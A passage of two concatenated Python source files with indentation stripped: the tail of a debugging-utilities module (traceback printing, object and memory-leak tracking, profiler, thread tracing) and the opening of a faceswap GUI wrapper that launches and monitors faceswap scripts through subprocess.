print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
#print prefix+" EMPTY TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""Return a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50]
else:
return obj[:]
elif isinstance(obj, ndarray):
return "<ndarray %s %s>" % (str(obj.dtype), str(obj.shape))
elif hasattr(obj, '__len__'):
if len(obj) > 5:
return "<%s [%s,...]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj[:5]]))
else:
return "<%s [%s]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj]))
else:
return "<%s %s>" % (type(obj).__name__, obj.__class__.__name__)
except:
return str(type(obj))
def refPathString(chain):
"""Given a list of adjacent objects in a reference path, print the 'natural' path
names (ie, attribute names, keys, and indexes) that follow from one object to the next ."""
s = objString(chain[0])
i = 0
while i < len(chain)-1:
#print " -> ", i
i += 1
o1 = chain[i-1]
o2 = chain[i]
cont = False
if isinstance(o1, list) or isinstance(o1, tuple):
if any([o2 is x for x in o1]):
s += "[%d]" % o1.index(o2)
continue
#print " not list"
if isinstance(o2, dict) and hasattr(o1, '__dict__') and o2 == o1.__dict__:
i += 1
if i >= len(chain):
s += ".__dict__"
continue
o3 = chain[i]
for k in o2:
if o2[k] is o3:
s += '.%s' % k
cont = True
continue
#print " not __dict__"
if isinstance(o1, dict):
try:
if o2 in o1:
s += "[key:%s]" % objString(o2)
continue
except TypeError:
pass
for k in o1:
if o1[k] is o2:
s += "[%s]" % objString(k)
cont = True
continue
#print " not dict"
#for k in dir(o1): ## Not safe to request attributes like this.
#if getattr(o1, k) is o2:
#s += ".%s" % k
#cont = True
#continue
#print " not attr"
if cont:
continue
s += " ? "
sys.stdout.flush()
return s
def objectSize(obj, ignore=None, verbose=False, depth=0, recursive=False):
"""Guess how much memory an object is using"""
ignoreTypes = ['MethodType', 'UnboundMethodType', 'BuiltinMethodType', 'FunctionType', 'BuiltinFunctionType']
ignoreTypes = [getattr(types, key) for key in ignoreTypes if hasattr(types, key)]
ignoreRegex = re.compile('(method-wrapper|Flag|ItemChange|Option|Mode)')
if ignore is None:
ignore = {}
indent = ' '*depth
try:
hash(obj)
hsh = obj
except:
hsh = "%s:%d" % (str(type(obj)), id(obj))
if hsh in ignore:
return 0
ignore[hsh] = 1
try:
size = sys.getsizeof(obj)
except TypeError:
size = 0
if isinstance(obj, ndarray):
try:
size += len(obj.data)
except:
pass
if recursive:
if type(obj) in [list, tuple]:
if verbose:
print(indent+"list:")
for o in obj:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', s)
size += s
elif isinstance(obj, dict):
if verbose:
print(indent+"list:")
for k in obj:
s = objectSize(obj[k], ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', k, s)
size += s
#elif isinstance(obj, QtCore.QObject):
#try:
#childs = obj.children()
#if verbose:
#print indent+"Qt children:"
#for ch in childs:
#s = objectSize(obj, ignore=ignore, verbose=verbose, depth=depth+1)
#size += s
#if verbose:
#print indent + ' +', ch.objectName(), s
#except:
#pass
#if isinstance(obj, types.InstanceType):
gc.collect()
if verbose:
print(indent+'attrs:')
for k in dir(obj):
if k in ['__dict__']:
continue
o = getattr(obj, k)
if type(o) in ignoreTypes:
continue
strtyp = str(type(o))
if ignoreRegex.search(strtyp):
continue
#if isinstance(o, types.ObjectType) and strtyp == "<type 'method-wrapper'>":
#continue
#if verbose:
#print indent, k, '?'
refs = [r for r in gc.get_referrers(o) if type(r) != types.FrameType]
if len(refs) == 1:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
size += s
if verbose:
print(indent + " +", k, s)
#else:
#if verbose:
#print indent + ' -', k, len(refs)
return size
class GarbageWatcher(object):
"""
Convenient dictionary for holding weak references to objects.
    Mainly used to check whether the objects have been collected yet or not.
Example:
gw = GarbageWatcher()
gw['objName'] = obj
gw['objName2'] = obj2
gw.check()
"""
def __init__(self):
self.objs = weakref.WeakValueDictionary()
self.allNames = []
def add(self, obj, name):
self.objs[name] = obj
self.allNames.append(name)
def __setitem__(self, name, obj):
self.add(obj, name)
def check(self):
"""Print a list of all watched objects and whether they have been collected."""
gc.collect()
dead = self.allNames[:]
alive = []
for k in self.objs:
dead.remove(k)
alive.append(k)
print("Deleted objects:", dead)
print("Live objects:", alive)
def __getitem__(self, item):
return self.objs[item]
class Profiler(object):
"""Simple profiler allowing measurement of multiple time intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `PYQTGRAPHPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `PYQTGRAPHPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "pyqtgraph." prefix from the module.
"""
_profilers = os.environ.get("PYQTGRAPHPROFILE", None)
_profilers = _profilers.split(",") if _profilers is not None else []
_depth = 0
_msgs = []
disable = False # set this flag to disable all or individual profilers at runtime
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabledProfiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if disabled is True or (disabled == 'env' and len(cls._profilers) == 0):
return cls._disabledProfiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[-1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if disabled == 'env' and func_qualname not in cls._profilers: # don't do anything
return cls._disabledProfiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._markCount = 0
obj._finished = False
obj._firstTime = obj._lastTime = ptime.time()
obj._newMsg("> Entering " + obj._name)
return obj
def __call__(self, msg=None):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._markCount)
self._markCount += 1
newTime = ptime.time()
self._newMsg(" %s: %0.4f ms",
msg, (newTime - self._lastTime) * 1000)
self._lastTime = newTime
def mark(self, msg=None):
self(msg)
def _newMsg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._newMsg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0]%m[1] for m in self._msgs]))
type(self)._msgs = []
def profile(code, name='profile_run', sort='cumulative', num=30):
"""Common-use for cProfile"""
cProfile.run(code, name)
stats = pstats.Stats(name)
stats.sort_stats(sort)
stats.print_stats(num)
return stats
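# Illustrative call (the profiled expression below is a placeholder, not from this module):
#   stats = profile("someFunction()", name="my_profile", sort="cumulative", num=20)
# The returned pstats.Stats object can be re-sorted and re-printed afterwards,
# e.g. stats.sort_stats('tottime').print_stats(10).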
#### Code for listing (nearly) all objects in the known universe
#### http://utcc.utoronto.ca/~cks/space/blog/python/GetAllObjects
# Recursively expand slist's objects
# into olist, using seen to track
# already processed objects.
def _getr(slist, olist, first=True):
i = 0
for e in slist:
oid = id(e)
typ = type(e)
if oid in olist or typ is int: ## or e in olist: ## since we're excluding all ints, there is no longer a need to check for olist keys
continue
olist[oid] = e
if first and (i%1000) == 0:
gc.collect()
tl = gc.get_referents(e)
if tl:
_getr(tl, olist, first=False)
i += 1
# The public function.
def get_all_objects():
"""Return a list of all live Python objects (excluding int and long), not including the list itself."""
gc.collect()
gcl = gc.get_objects()
olist = {}
_getr(gcl, olist)
del olist[id(olist)]
del olist[id(gcl)]
del olist[id(sys._getframe())]
return olist
def lookup(oid, objects=None):
"""Return an object given its ID, if it exists."""
if objects is None:
objects = get_all_objects()
return objects[oid]
class ObjTracker(object):
"""
Tracks all objects under the sun, reporting the changes between snapshots: what objects are created, deleted, and persistent.
This class is very useful for tracking memory leaks. The class goes to great (but not heroic) lengths to avoid tracking
its own internal objects.
Example:
ot = ObjTracker() # takes snapshot of currently existing objects
... do stuff ...
ot.diff() # prints lists of objects created and deleted since ot was initialized
... do stuff ...
ot.diff() # prints lists of objects created and deleted since last call to ot.diff()
# also prints list of items that were created since initialization AND have not been deleted yet
# (if done correctly, this list can tell you about objects that were leaked)
arrays = ot.findPersistent('ndarray') ## returns all objects matching 'ndarray' (string match, not instance checking)
## that were considered persistent when the last diff() was run
describeObj(arrays[0]) ## See if we can determine who has references to this array
"""
allObjs = {} ## keep track of all objects created and stored within class instances
allObjs[id(allObjs)] = None
def __init__(self):
self.startRefs = {} ## list of objects that exist when the tracker is initialized {oid: weakref}
## (If it is not possible to weakref the object, then the value is None)
self.startCount = {}
self.newRefs = {} ## list of objects that have been created since initialization
self.persistentRefs = {} ## list of objects considered 'persistent' when the last diff() was called
self.objTypes = {}
ObjTracker.allObjs[id(self)] = None
self.objs = [self.__dict__, self.startRefs, self.startCount, self.newRefs, self.persistentRefs, self.objTypes]
self.objs.append(self.objs)
for v in self.objs:
ObjTracker.allObjs[id(v)] = None
self.start()
def findNew(self, regex):
"""Return all objects matching regex that were considered 'new' when the last diff() was run."""
return self.findTypes(self.newRefs, regex)
def findPersistent(self, regex):
"""Return all objects matching regex that were considered 'persistent' when the last diff() was run."""
return self.findTypes(self.persistentRefs, regex)
def start(self):
"""
Remember the current set of objects as the comparison for all future calls to diff()
Called automatically on init, but can be called manually as well.
"""
refs, count, objs = self.collect()
for r in self.startRefs:
self.forgetRef(self.startRefs[r])
self.startRefs.clear()
self.startRefs.update(refs)
for r in refs:
self.rememberRef(r)
self.startCount.clear()
self.startCount.update(count)
#self.newRefs.clear()
#self.newRefs.update(refs)
def diff(self, **kargs):
"""
Compute all differences between the current object set and the reference set.
Print a set of reports for created, deleted, and persistent objects
"""
refs, count, objs = self.collect() ## refs contains the list of ALL objects
## Which refs have disappeared since call to start() (these are only displayed once, then forgotten.)
delRefs = {}
for i in list(self.startRefs.keys()):
if i not in refs:
delRefs[i] = self.startRefs[i]
del self.startRefs[i]
self.forgetRef(delRefs[i])
for i in list(self.newRefs.keys()):
if i not in refs:
delRefs[i] = self.newRefs[i]
del self.newRefs[i]
self.forgetRef(delRefs[i])
#print "deleted:", len(delRefs)
## Which refs have appeared since call to start() or diff()
persistentRefs = {} ## created since start(), but before last diff()
createRefs = {} ## created since last diff()
for o in refs:
if o not in self.startRefs:
if o not in self.newRefs:
createRefs[o] = refs[o] ## object has been created since last diff()
else:
persistentRefs[o] = refs[o] ## object has been created since start(), but before last diff() (persistent)
#print "new:", len(newRefs)
## self.newRefs holds the entire set of objects created since start()
for r in self.newRefs:
self.forgetRef(self.newRefs[r])
self.newRefs.clear()
self.newRefs.update(persistentRefs)
self.newRefs.update(createRefs)
for r in self.newRefs:
self.rememberRef(self.newRefs[r])
#print "created:", len(createRefs)
## self.persistentRefs holds all objects considered persistent.
self.persistentRefs.clear()
self.persistentRefs.update(persistentRefs)
print("----------- Count changes since start: ----------")
c1 = count.copy()
for k in self.startCount:
c1[k] = c1.get(k, 0) - self.startCount[k]
typs = list(c1.keys())
typs.sort(key=lambda a: c1[a])
for t in typs:
if c1[t] == 0:
continue
num = "%d" % c1[t]
print(" " + num + " "*(10-len(num)) + str(t))
print("----------- %d Deleted since last diff: ------------" % len(delRefs))
self.report(delRefs, objs, **kargs)
print("----------- %d Created since last diff: ------------" % len(createRefs))
self.report(createRefs, objs, **kargs)
print("----------- %d Created since start (persistent): ------------" % len(persistentRefs))
self.report(persistentRefs, objs, **kargs)
def __del__(self):
self.startRefs.clear()
self.startCount.clear()
self.newRefs.clear()
self.persistentRefs.clear()
del ObjTracker.allObjs[id(self)]
for v in self.objs:
del ObjTracker.allObjs[id(v)]
@classmethod
def isObjVar(cls, o):
return type(o) is cls or id(o) in cls.allObjs
def collect(self):
print("Collecting list of all objects...")
gc.collect()
objs = get_all_objects()
frame = sys._getframe()
del objs[id(frame)] ## ignore the current frame
del objs[id(frame.f_code)]
ignoreTypes = [int]
refs = {}
count = {}
for k in objs:
o = objs[k]
typ = type(o)
oid = id(o)
if ObjTracker.isObjVar(o) or typ in ignoreTypes:
continue
try:
ref = weakref.ref(o)
except:
ref = None
refs[oid] = ref
typ = type(o)
typStr = typeStr(o)
self.objTypes[oid] = typStr
ObjTracker.allObjs[id(typStr)] = None
count[typ] = count.get(typ, 0) + 1
print("All objects: %d Tracked objects: %d" % (len(objs), len(refs)))
return refs, count, objs
def forgetRef(self, ref):
if ref is not None:
del ObjTracker.allObjs[id(ref)]
def rememberRef(self, ref):
## Record the address of the weakref object so it is not included in future object counts.
if ref is not None:
ObjTracker.allObjs[id(ref)] = None
def lookup(self, oid, ref, objs=None):
if ref is None or ref() is None:
try:
obj = lookup(oid, objects=objs)
except:
obj = None
else:
obj = ref()
return obj
def report(self, refs, allobjs=None, showIDs=False):
if allobjs is None:
allobjs = get_all_objects()
count = {}
rev = {}
for oid in refs:
obj = self.lookup(oid, refs[oid], allobjs)
if obj is None:
typ = "[del] " + self.objTypes[oid]
else:
typ = typeStr(obj)
if typ not in rev:
rev[typ] = []
rev[typ].append(oid)
c = count.get(typ, [0,0])
count[typ] = [c[0]+1, c[1]+objectSize(obj)]
typs = list(count.keys())
typs.sort(key=lambda a: count[a][1])
for t in typs:
line = " %d\t%d\t%s" % (count[t][0], count[t][1], t)
if showIDs:
line += "\t"+",".join(map(str,rev[t]))
print(line)
def findTypes(self, refs, regex):
allObjs = get_all_objects()
ids = {}
objs = []
r = re.compile(regex)
for k in refs:
if r.search(self.objTypes[k]):
objs.append(self.lookup(k, refs[k], allObjs))
return objs
def describeObj(obj, depth=4, path=None, ignore=None):
"""
Trace all reference paths backward, printing a list of different ways this object can be accessed.
Attempts to answer the question "who has a reference to this object"
"""
if path is None:
path = [obj]
if ignore is None:
ignore = {} ## holds IDs of objects used within the function.
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
printed=False
for ref in refs:
if id(ref) in ignore:
continue
if id(ref) in list(map(id, path)):
print("Cyclic reference: " + refPathString([ref]+path))
printed = True
continue
newPath = [ref]+path
if len(newPath) >= depth:
refStr = refPathString(newPath)
if '[_]' not in refStr: ## ignore '_' references generated by the interactive shell
print(refStr)
printed = True
else:
describeObj(ref, depth, newPath, ignore)
printed = True
if not printed:
print("Dead end: " + refPathString(path))
def typeStr(obj):
"""Create a more useful type string by making <instance> types report their class."""
typ = type(obj)
if typ == getattr(types, 'InstanceType', None):
return "<instance of %s>" % obj.__class__.__name__
else:
return str(typ)
def searchRefs(obj, *args):
"""Pseudo-interactive function for tracing references backward.
**Arguments:**
obj: The initial object from which to start searching
args: A set of string or int arguments.
each integer selects one of obj's referrers to be the new 'obj'
each string indicates an action to take on the current 'obj':
t: print the types of obj's referrers
l: print the lengths of obj's referrers (if they have __len__)
i: print the IDs of obj's referrers
o: print obj
ro: return obj
rr: return list of obj's referrers
Examples::
searchRefs(obj, 't') ## Print types of all objects referring to obj
searchRefs(obj, 't', 0, 't') ## ..then select the first referrer and print the types of its referrers
searchRefs(obj, 't', 0, 't', 'l') ## ..also print lengths of the last set of referrers
searchRefs(obj, 0, 1, 'ro') ## Select index 0 from obj's referrer, then select index 1 from the next set of referrers, then return that object
"""
ignore = {id(sys._getframe()): None}
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
for a in args:
#fo = allFrameObjs()
#refs = [r for r in refs if r not in fo]
if type(a) is int:
obj = refs[a]
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
elif a == 't':
print(list(map(typeStr, refs)))
elif a == 'i':
print(list(map(id, refs)))
elif a == 'l':
def slen(o):
if hasattr(o, '__len__'):
return len(o)
else:
return None
print(list(map(slen, refs)))
elif a == 'o':
print(obj)
elif a == 'ro':
return obj
elif a == 'rr':
return refs
def allFrameObjs():
"""Return list of frame objects in current stack. Useful if you want to ignore these objects in refernece searches"""
f = sys._getframe()
objs = []
while f is not None:
objs.append(f)
objs.append(f.f_code)
#objs.append(f.f_locals)
#objs.append(f.f_globals)
#objs.append(f.f_builtins)
f = f.f_back
return objs
def findObj(regex):
"""Return a list of objects whose typeStr matches regex"""
allObjs = get_all_objects()
objs = []
r = re.compile(regex)
for i in allObjs:
obj = allObjs[i]
if r.search(typeStr(obj)):
objs.append(obj)
return objs
def listRedundantModules():
"""List modules that have been imported more than once via different paths."""
mods = {}
for name, mod in sys.modules.items():
if not hasattr(mod, '__file__'):
continue
mfile = os.path.abspath(mod.__file__)
if mfile[-1] == 'c':
mfile = mfile[:-1]
if mfile in mods:
print("module at %s has 2 names: %s, %s" % (mfile, name, mods[mfile]))
else:
mods[mfile] = name
def walkQObjectTree(obj, counts=None, verbose=False, depth=0):
"""
Walk through a tree of QObjects, doing nothing to them.
The purpose of this function is to find dead objects and generate a crash
immediately rather than stumbling upon them later.
Prints a count of the objects encountered, for fun. (or is it?)
"""
if verbose:
print(" "*depth + typeStr(obj))
report = False
if counts is None:
counts = {}
report = True
typ = str(type(obj))
try:
counts[typ] += 1
except KeyError:
counts[typ] = 1
for child in obj.children():
walkQObjectTree(child, counts, verbose, depth+1)
return counts
QObjCache = {}
def qObjectReport(verbose=False):
"""Generate a report counting all QObjects and their types"""
global QObjCache
count = {}
for obj in findObj('PyQt'):
if isinstance(obj, QtCore.QObject):
oid = id(obj)
if oid not in QObjCache:
QObjCache[oid] = typeStr(obj) + " " + obj.objectName()
try:
QObjCache[oid] += " " + obj.parent().objectName()
QObjCache[oid] += " " + obj.text()
except:
pass
print("check obj", oid, str(QObjCache[oid]))
if obj.parent() is None:
walkQObjectTree(obj, count, verbose)
typs = list(count.keys())
typs.sort()
for t in typs:
print(count[t], "\t", t)
class PrintDetector(object):
"""Find code locations that print to stdout."""
def __init__(self):
self.stdout = sys.stdout
sys.stdout = self
def remove(self):
sys.stdout = self.stdout
def __del__(self):
self.remove()
def write(self, x):
self.stdout.write(x)
traceback.print_stack()
def flush(self):
self.stdout.flush()
def listQThreads():
"""Prints Thread IDs (Qt's, not OS's) for all QThreads."""
thr = findObj('[Tt]hread')
thr = [t for t in thr if isinstance(t, QtCore.QThread)]
import sip
for t in thr:
print("--> ", t)
print(" Qt ID: 0x%x" % sip.unwrapinstance(t))
def pretty(data, indent=''):
"""Format nested dict/list/tuple structures into a more human-readable string
This function is a bit better than pprint for displaying OrderedDicts.
"""
ret = ""
ind2 = indent + " "
if isinstance(data, dict):
ret = indent+"{\n"
for k, v in data.items():
ret += ind2 + repr(k) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+"}\n"
elif isinstance(data, list) or isinstance(data, tuple):
s = repr(data)
if len(s) < 40:
ret += indent + s
else:
if isinstance(data, list):
d = '[]'
else:
d = '()'
ret = indent+d[0]+"\n"
for i, v in enumerate(data):
ret += ind2 + str(i) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+d[1]+"\n"
else:
ret += indent + repr(data)
return ret
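# Quick illustration of pretty() (hypothetical data, not taken from this module):
#   data = {'a': [1, 2, 3], 'b': {'c': (4, 5)}}
#   print(pretty(data))
# Nested dicts and long lists/tuples are expanded one item per line with
# increasing indentation, which is easier to scan than pprint for OrderedDicts.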
class ThreadTrace(object):
"""
Used to debug freezing by starting a new thread that reports on the
location of other threads periodically.
"""
def __init__(self, interval=10.0):
self.interval = interval
self.lock = Mutex()
self._stop = False
self.start()
def stop(self):
with self.lock:
self._stop = True
def start(self, interval=None):
if interval is not None:
self.interval = interval
self._stop = False
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def run(self):
while True:
with self.lock:
if self._stop is True:
return
print("\n============= THREAD FRAMES: ================")
for id, frame in sys._current_frames().items():
if id == threading.current_thread().ident:
continue
print("<< thread %d >>" % id)
traceback.print_stack(frame)
print("===============================================\n")
time.sleep(self.interval)
class ThreadColor(object):
"""
Wrapper on stdout/stderr that colors text by the current thread ID.
*stream* must be 'stdout' or 'stderr'.
"""
colors = {}
lock = Mutex()
def __init__(self, stream):
self.stream = getattr(sys, stream)
self.err = stream == 'stderr'
setattr(sys, stream, self)
def write(self, msg):
with self.lock:
cprint.cprint(self.stream, self.color(), msg, -1, stderr=self.err)
def flush(self):
with self.lock:
self.stream.flush()
def color(self):
tid = threading.current_thread()
if tid not in self.colors:
c = (len(self.colors) % 15) + 1
self.colors[tid] = c
return self.colors[tid]
def enableFaulthandler():
""" Enable faulthandler for all threads.
If the faulthandler package is available, this function disables and then
re-enables fault handling for all threads (this is necessary to ensure any
new threads are handled correctly), and returns True.
If faulthandler is not available, then returns False.
"""
try:
import faulthandler
# necessary to disable first or else new threads may not be handled.
faulthandler.disable()
faulthandler.enable(all_threads=True)
return True
except ImportError:
return False
|
wrapper.py
|
#!/usr/bin/env python3
""" Process wrapper for underlying faceswap commands for the GUI """
import os
import re
import signal
import subprocess
from subprocess import PIPE, Popen, TimeoutExpired
import sys
import tkinter as tk
from threading import Thread
from time import time
from .utils import Images
class ProcessWrapper(object):
""" Builds command, launches and terminates the underlying
faceswap process. Updates GUI display depending on state """
def __init__(self, statusbar, session=None, pathscript=None, cliopts=None):
self.tk_vars = self.set_tk_vars()
self.session = session
self.pathscript = pathscript
self.cliopts = cliopts
self.command = None
self.statusbar = statusbar
self.task = FaceswapControl(self)
def set_tk_vars(self):
""" TK Variables to be triggered by ProcessWrapper to indicate
what state various parts of the GUI should be in """
display = tk.StringVar()
display.set(None)
runningtask = tk.BooleanVar()
runningtask.set(False)
actioncommand = tk.StringVar()
actioncommand.set(None)
actioncommand.trace("w", self.action_command)
generatecommand = tk.StringVar()
generatecommand.set(None)
generatecommand.trace("w", self.generate_command)
consoleclear = tk.BooleanVar()
consoleclear.set(False)
return {"display": display,
"runningtask": runningtask,
"action": actioncommand,
"generate": generatecommand,
"consoleclear": consoleclear}
def action_command(self, *args):
""" The action to perform when the action button is pressed """
if not self.tk_vars["action"].get():
return
category, command = self.tk_vars["action"].get().split(",")
if self.tk_vars["runningtask"].get():
self.task.terminate()
else:
self.command = command
args = self.prepare(category)
self.task.execute_script(command, args)
self.tk_vars["action"].set(None)
def generate_command(self, *args):
""" Generate the command line arguments and output """
if not self.tk_vars["generate"].get():
return
category, command = self.tk_vars["generate"].get().split(",")
args = self.build_args(category, command=command, generate=True)
self.tk_vars["consoleclear"].set(True)
print(" ".join(args))
self.tk_vars["generate"].set(None)
def prepare(self, category):
""" Prepare the environment for execution """
self.tk_vars["runningtask"].set(True)
self.tk_vars["consoleclear"].set(True)
print("Loading...")
self.statusbar.status_message.set("Executing - "
+ self.command + ".py")
mode = "indeterminate" if self.command == "train" else "determinate"
self.statusbar.progress_start(mode)
args = self.build_args(category)
self.tk_vars["display"].set(self.command)
return args
def build_args(self, category, command=None, generate=False):
""" Build the faceswap command and arguments list """
command = self.command if not command else command
script = "{}.{}".format(category, "py")
pathexecscript = os.path.join(self.pathscript, script)
args = ["python"] if generate else ["python", "-u"]
args.extend([pathexecscript, command])
for cliopt in self.cliopts.gen_cli_arguments(command):
args.extend(cliopt)
if command == "train" and not generate:
self.set_session_stats(cliopt)
if command == "train" and not generate:
args.append("-gui") # Embed the preview pane
return args
def set_session_stats(self, cliopt):
""" Set the session stats for batchsize and modeldir """
if cliopt[0] == "-bs":
self.session.stats["batchsize"] = int(cliopt[1])
if cliopt[0] == "-m":
self.session.modeldir = cliopt[1]
def terminate(self, message):
""" Finalise wrapper when process has exited """
self.tk_vars["runningtask"].set(False)
self.statusbar.progress_stop()
self.statusbar.status_message.set(message)
self.tk_vars["display"].set(None)
Images().delete_preview()
if self.command == "train":
self.session.save_session()
self.session.__init__()
self.command = None
print("Process exited.")
class FaceswapControl(object):
""" Control the underlying Faceswap tasks """
__group_processes = ["effmpeg"]
def __init__(self, wrapper):
self.wrapper = wrapper
self.statusbar = wrapper.statusbar
self.command = None
self.args = None
self.process = None
self.consoleregex = {"loss": re.compile(r"([a-zA-Z_]+):.*?(\d+\.\d+)"),
"tqdm": re.compile(r"(\d+%|\d+/\d+|\d+:\d+|\d+\.\d+[a-zA-Z/]+)")}
def execute_script(self, command, args):
""" Execute the requested Faceswap Script """
self.command = command
kwargs = {"stdout": PIPE,
"stderr": PIPE,
"bufsize": 1,
"universal_newlines": True}
if self.command in self.__group_processes:
kwargs["preexec_fn"] = os.setsid
if os.name == "nt":
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
self.process = Popen(args, **kwargs)
self.thread_stdout()
self.thread_stderr()
def read_stdout(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stdout.readline()
if output == "" and self.process.poll() is not None:
break
if output:
if (self.command == "train" and self.capture_loss(output)) or (
self.command != "train" and self.capture_tqdm(output)):
continue
print(output.strip())
returncode = self.process.poll()
message = self.set_final_status(returncode)
self.wrapper.terminate(message)
def read_stderr(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stderr.readline()
if output == "" and self.process.poll() is not None:
break
if output:
if self.command != "train" and self.capture_tqdm(output):
continue
print(output.strip(), file=sys.stderr)
def thread_stdout(self):
""" Put the subprocess stdout so that it can be read without
blocking """
thread = Thread(target=self.read_stdout)
thread.daemon = True
thread.start()
def thread_stderr(self):
""" Put the subprocess stderr so that it can be read without
blocking """
thread = Thread(target=self.read_stderr)
thread.daemon = True
thread.start()
def capture_loss(self, string):
""" Capture loss values from stdout """
if not str.startswith(string, "["):
return False
loss = self.consoleregex["loss"].findall(string)
if len(loss) < 2:
return False
self.wrapper.session.add_loss(loss)
message = ""
for item in loss:
message += "{}: {} ".format(item[0], item[1])
if not message:
return False
elapsed = self.wrapper.session.timestats["elapsed"]
iterations = self.wrapper.session.stats["iterations"]
message = "Elapsed: {} Iteration: {} {}".format(elapsed,
iterations,
message)
